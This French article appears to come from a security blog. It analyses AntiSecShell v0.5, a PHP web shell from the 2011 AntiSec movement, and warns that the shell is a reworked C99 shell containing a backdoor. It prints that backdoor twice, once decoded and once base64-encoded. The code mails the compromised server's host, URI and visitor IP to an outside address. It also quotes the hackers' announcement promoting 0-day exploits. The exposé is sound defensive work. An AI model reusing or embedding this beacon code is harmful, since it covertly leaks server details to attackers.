Un PHP Shell sert à un pirate informatique à explorer, à prendre contrôle et à maintenir l’accès sur un serveur piraté. AntiSecShell v0.5 (ASS) a été construit par la communauté underground de pirates rattachée à l’opération AntiSec dans le but de contribuer à la création d’un nouveau shell. Mais comme nous allons vous le montrer, il n’est pas si parfait que ça… Loin de là même !
Voici le message des pirates :
“On 25.07.2011 at the IRC of notorious group Anonymous (we support
them too), underground groups will reveal 0-day exploits
exclusively only for selected members with verification code. The
code is in the AntiSecShell we released earlier, it is displayed at
the bottom of the page. What will 0-days cover you ask?
– Apache 2.X branch RCE exploit
– OpenSSH(debian and x86 systems only) all versions 0-day remote
root exploit
– vBulletin 3.8.6 and 3.8.4 SQL injection 0-day exploit
– MyBB 1.6.X branch CSRF 0-day exploit
and only for few selected people will receive nginx *** overflow
exploit working on all versions.
The underground is here.
The underground is today.
The underground will crush all whitehats.
Anti-sec till we die.”
Il possède de nombreuses fonctions, mais la plus importante de toutes est qu’il est censé pouvoir contourner toutes les protections des serveurs (le mod_security par exemple). Ce n’est pas seulement un shell php mais un symbole pour le mouvement Anti Security.
Mais tout n’est pas si beau en réalité… Déjà, après un petit coup d’œil au script, il se trouve que ce n’est qu’une version revue du célèbre C99 PHP Shell. Mais ce n’est tout. Il est piégé, il contient un backdoor. On peut facilement en trouver des exemple en déchiffrant certaines variables présente dans le code PHP :
// 1mpl3m3n7 f33db4ck 0n v3r510n v.0.6, 4w417!
$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "")
{
$visitcount = 0;
$Subm1773r = $_SERVER["REMOTE_ADDR"];
$w3b = $_SERVER["HTTP_HOST"];
$h0s7 = $_SERVER["REQUEST_URI"];
$t0 = rawurldecode($w3b.$h0s7);
$b0dy = "7h3r3 1s f33db4ck f0r y0u ".$target. " by ".$Subm1773r;
mail("0d4y@mail.ru","ASS v0.5 http://$t0 by $Subm1773r", $b0dy);
} else { $visitcount; }
setcookie("visits",$visitcount);
// 7h4nk5 f0r y0ur 5upp0r7
Ce code ressemble à cela d’origine :
$feedback="Ly8gMW1wbDNtM243IGYzM2RiNGNrIDBuIHYzcjUxMG4gdi4wLjYsIDR3NDE3IQokdmlzaXRjb3VudCA9ICRIVFRQX0NPT0tJRV9WQVJTWyJ2aXNpdHMiXTsgaWYoICR2aXNpdGNvdW50ID09ICIiKSB7JHZpc2l0Y291bnQgPSAwOyAkU3VibTE3NzNyID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07ICR3M2IgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07ICRoMHM3ID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICR0MCA9IHJhd3VybGRlY29kZSgkdzNiLiRoMHM3KTsgJGIwZHkgPSAiN2gzcjMgMXMgZjMzZGI0Y2sgZjByIHkwdSAiLiAkdGFyZ2V0IC4gIiBieSAiIC4gJFN1Ym0xNzczcjsgbWFpbCgiMGQ0eUBtYWlsLnJ1IiwiQVNTIHYwLjUgaHR0cDovLyR0MCBieSAkU3VibTE3NzNyIiwgJGIwZHkpOyB9IGVsc2UgeyAkdmlzaXRjb3VudDsgfSBzZXRjb29raWUoInZpc2l0cyIsJHZpc2l0Y291bnQpOwovLyA3aDRuazUgZjByIHkwdXIgNXVwcDByNw==";
Il sert à prévenir les pirates du groupe par mail que le shell à été installé sur un serveur piraté. Il leur enverra aussi toutes les informations relatives à ce dernier. Ce qui, vous vous en doutez, leur permettra par la suite d’en prendre le contrôle facilement…
Bref, un shell sans aucun intérêt, déjà détecté par les antivirus du marché et backdooré. Prudence.